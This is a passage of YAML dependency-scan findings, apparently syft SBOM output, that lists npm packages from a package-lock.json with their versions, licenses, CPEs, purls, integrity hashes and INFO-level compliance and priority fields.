integrity: sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q==
dependencies:
any-promise: ^1.0.0
object-assign: ^4.0.1
thenify-all: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 545c4a29aa435f71
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: nanoid 3.3.11'
title: nanoid 3.3.11
description: 'Package discovered: nanoid 3.3.11'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fc2d97a12d1a4dda
name: nanoid
version: 3.3.11
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:nanoid_project:nanoid:3.3.11:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/nanoid@3.3.11
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz
integrity: sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 932afc2de4b38fa5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: negotiator 0.6.3'
title: negotiator 0.6.3
description: 'Package discovered: negotiator 0.6.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 312bd96694b2eb5b
name: negotiator
version: 0.6.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:negotiator:negotiator:0.6.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/negotiator@0.6.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz
integrity: sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d346e21d42fdf73e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: next 14.2.3'
title: next 14.2.3
description: 'Package discovered: next 14.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a9792237818f8415
name: next
version: 14.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:vercel:next.js:14.2.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/next@14.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/next/-/next-14.2.3.tgz
integrity: sha512-dowFkFTR8v79NPJO4QsBUtxv0g9BrS/phluVpMAt2ku7H+cbcBJlopXjkWlwxrk/xGqMemr7JkGPGemPrLLX7A==
dependencies:
'@next/env': 14.2.3
'@swc/helpers': 0.5.5
busboy: 1.6.0
caniuse-lite: ^1.0.30001579
graceful-fs: ^4.2.11
postcss: 8.4.31
styled-jsx: 5.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 35dad46b81d74be4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: node-cron 3.0.3'
title: node-cron 3.0.3
description: 'Package discovered: node-cron 3.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5c4492e68f441264
name: node-cron
version: 3.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:node-cron:node-cron:3.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node-cron:node_cron:3.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node_cron:node-cron:3.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node_cron:node_cron:3.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node:node-cron:3.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node:node_cron:3.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/node-cron@3.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz
integrity: sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A==
dependencies:
uuid: 8.3.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5d72f54e4946a64f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: node-fetch 2.7.0'
title: node-fetch 2.7.0
description: 'Package discovered: node-fetch 2.7.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 71294da0e67ef2a3
name: node-fetch
version: 2.7.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:node-fetch_project:node-fetch:2.7.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/node-fetch@2.7.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz
integrity: sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==
dependencies:
whatwg-url: ^5.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2cbaa504cc478c46
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: node-forge 1.4.0'
title: node-forge 1.4.0
description: 'Package discovered: node-forge 1.4.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c1e5f20287afef44
name: node-forge
version: 1.4.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: (BSD-3-Clause OR GPL-2.0)
spdxExpression: (BSD-3-Clause OR GPL-2.0)
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:digitalbazaar:forge:1.4.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/node-forge@1.4.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/node-forge/-/node-forge-1.4.0.tgz
integrity: sha512-LarFH0+6VfriEhqMMcLX2F7SwSXeWwnEAJEsYm5QKWchiVYVvJyV9v7UDvUv+w5HO23ZpQTXDv/GxdDdMyOuoQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c9ae4bba0c53507d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: node-releases 2.0.38'
title: node-releases 2.0.38
description: 'Package discovered: node-releases 2.0.38'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 157e4f935702d7be
name: node-releases
version: 2.0.38
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:node-releases:node-releases:2.0.38:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node-releases:node_releases:2.0.38:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node_releases:node-releases:2.0.38:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node_releases:node_releases:2.0.38:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node:node-releases:2.0.38:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:node:node_releases:2.0.38:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/node-releases@2.0.38
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/node-releases/-/node-releases-2.0.38.tgz
integrity: sha512-3qT/88Y3FbH/Kx4szpQQ4HzUbVrHPKTLVpVocKiLfoYvw9XSGOX2FmD2d6DrXbVYyAQTF2HeF6My8jmzx7/CRw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b468b7afcd57f5e8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: nodemailer 6.10.1'
title: nodemailer 6.10.1
description: 'Package discovered: nodemailer 6.10.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bdc7a63994d0b28a
name: nodemailer
version: 6.10.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT-0
spdxExpression: MIT-0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:nodemailer:nodemailer:6.10.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/nodemailer@6.10.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz
integrity: sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: eca5920a6d6c920a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: nopt 7.2.1'
title: nopt 7.2.1
description: 'Package discovered: nopt 7.2.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 47f001cd3ecd3ee8
name: nopt
version: 7.2.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:nopt:nopt:7.2.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/nopt@7.2.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/nopt/-/nopt-7.2.1.tgz
integrity: sha512-taM24ViiimT/XntxbPyJQzCG+p4EKOpgD3mxFwW38mGjVUrfERQOeY4EDHjdnptttfHuHQXFx+lTP08Q+mLa/w==
dependencies:
abbrev: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b6fa9eec1e273eef
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: normalize-path 3.0.0'
title: normalize-path 3.0.0
description: 'Package discovered: normalize-path 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 86c9c8fe4da1b72f
name: normalize-path
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:normalize-path:normalize-path:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize-path:normalize_path:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize_path:normalize-path:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize_path:normalize_path:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize:normalize-path:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize:normalize_path:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/normalize-path@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz
integrity: sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0c9db30b81ebd770
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: normalize-svg-path 1.1.0'
title: normalize-svg-path 1.1.0
description: 'Package discovered: normalize-svg-path 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2e420341fd4164af
name: normalize-svg-path
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:normalize-svg-path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize-svg-path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize_svg_path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize_svg_path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize-svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize-svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize_svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize_svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:normalize:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/normalize-svg-path@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/normalize-svg-path/-/normalize-svg-path-1.1.0.tgz
integrity: sha512-r9KHKG2UUeB5LoTouwDzBy2VxXlHsiM6fyLQvnJa0S5hrhzqElH/CH7TUGhT1fVvIYBIKf3OpY4YJ4CK+iaqHg==
dependencies:
svg-arc-to-cubic-bezier: ^3.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bb2a72a38fc8e367
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: object-assign 4.1.1'
title: object-assign 4.1.1
description: 'Package discovered: object-assign 4.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d7b65c8670c0c943
name: object-assign
version: 4.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:object-assign:object-assign:4.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object-assign:object_assign:4.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object_assign:object-assign:4.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object_assign:object_assign:4.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object:object-assign:4.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object:object_assign:4.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/object-assign@4.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz
integrity: sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7280439ae019eb34
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: object-hash 3.0.0'
title: object-hash 3.0.0
description: 'Package discovered: object-hash 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f0415e28bd0fa73d
name: object-hash
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:object-hash:object-hash:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object-hash:object_hash:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object_hash:object-hash:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object_hash:object_hash:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object:object-hash:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object:object_hash:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/object-hash@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz
integrity: sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 570f098417dfedef
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: object-inspect 1.13.4'
title: object-inspect 1.13.4
description: 'Package discovered: object-inspect 1.13.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 67701f4036faa68d
name: object-inspect
version: 1.13.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:object-inspect:object-inspect:1.13.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object-inspect:object_inspect:1.13.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object_inspect:object-inspect:1.13.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object_inspect:object_inspect:1.13.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object:object-inspect:1.13.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:object:object_inspect:1.13.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/object-inspect@1.13.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz
integrity: sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 276b1e3a3b3501f5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: on-finished 2.3.0'
title: on-finished 2.3.0
description: 'Package discovered: on-finished 2.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3329ff372baa3c68
name: on-finished
version: 2.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:on-finished:on-finished:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on-finished:on_finished:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on_finished:on-finished:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on_finished:on_finished:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on:on-finished:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on:on_finished:2.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/on-finished@2.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz
integrity: sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww==
dependencies:
ee-first: 1.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1ede69e18336ab8f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: on-finished 2.4.1'
title: on-finished 2.4.1
description: 'Package discovered: on-finished 2.4.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9c42ff2fa50e9c68
name: on-finished
version: 2.4.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:on-finished:on-finished:2.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on-finished:on_finished:2.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on_finished:on-finished:2.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on_finished:on_finished:2.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on:on-finished:2.4.1:*:*:*:*:*:*:*
source: syft-generated
